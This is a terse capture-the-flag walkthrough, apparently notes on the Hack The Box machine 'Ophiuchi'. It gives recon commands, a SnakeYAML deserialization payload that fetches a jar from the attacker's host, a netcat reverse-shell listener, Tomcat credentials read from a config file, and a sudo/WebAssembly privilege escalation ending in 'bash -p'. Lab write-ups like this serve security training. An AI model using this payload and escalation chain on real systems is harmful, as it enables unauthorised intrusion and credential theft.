nmap -A -p- -oA ophiuchi 10.129.152.152 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA ophiuchi 10.129.152.152

nmap -sU -O -p- -oA ophiuchi-udp 10.129.152.152

nikto -h 10.129.152.152:80

Pasted image 20220205085625.png

Pasted image 20220205085727.png

whatweb http://10.129.152.152

Pasted image 20220205085854.png

http://10.129.152.152:8080

Pasted image 20220205085921.png

git clone https://github.com/artsploit/yaml-payload

Pasted image 20220205090528.png

tree -fs

Pasted image 20220205090616.png

nmap -p8080 10.129.152.152 --script http-enum -oN webScan

http://10.129.152.152:8080/manager

Pasted image 20220205090718.png

cat src/artsploit/AwesomeScriptEngineFactory.java

Pasted image 20220205091012.png

javac src/artsploit/AwesomeScriptEngineFactory.java

jar -cvf yaml-payload.jar -C src/ .

Pasted image 20220205091158.png

python3 -m http.server 80

nc -lvnp 443

!!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [[ !!java.net.URL ["http://10.10.14.20/yaml-payload.jar"] ]] ]

Pasted image 20220205091817.png

cat /opt/tomcat/conf/tomcat-users.xml

Credenciales-> admin:whythereisalimit

Pasted image 20220205092344.png

su admin

Pasted image 20220205092459.png

sudo -l

Pasted image 20220205092524.png

cd /tmp

ls -l /opt/wasm-functions

cat /opt/wasm-functions/index.go

Pasted image 20220205092859.png

cp /opt/wasm-functions/main.wasm .

touch deploy.sh

ls -l /bin/bash

vim deploy.sh

sudo /usr/bin/go run /opt/wasm-functions/index.go

Pasted image 20220205093334.png

git clone --recursive https://github.com/WebAssembly/wabt

Pasted image 20220205093842.png

cd wabt

git submodule update --init

mkdir build

cmake ..

Pasted image 20220205093955.png

cmake --build .

Pasted image 20220205094106.png

python3 -m http.server 8082

wget http://10.129.152.152:8082/main.wasm

Pasted image 20220205094518.png

./wasm2wat ../../main.wasm

./wasm2wat ../../main.wasm > main.wat

cat main.wat

Pasted image 20220205095026.png

rm main.wasm

./wat2wasm main.wat > main.wasm

Pasted image 20220205095358.png

python3 -m http.server 80

cd tmp

wget http://10.10.14.26/main.wasm

Pasted image 20220205095417.png

chmod +x main.wasm

ls -l /bin/bash

cat deploy.sh

ls -l /bin/bash

bash -p

Pasted image 20220205095739.png

boxes
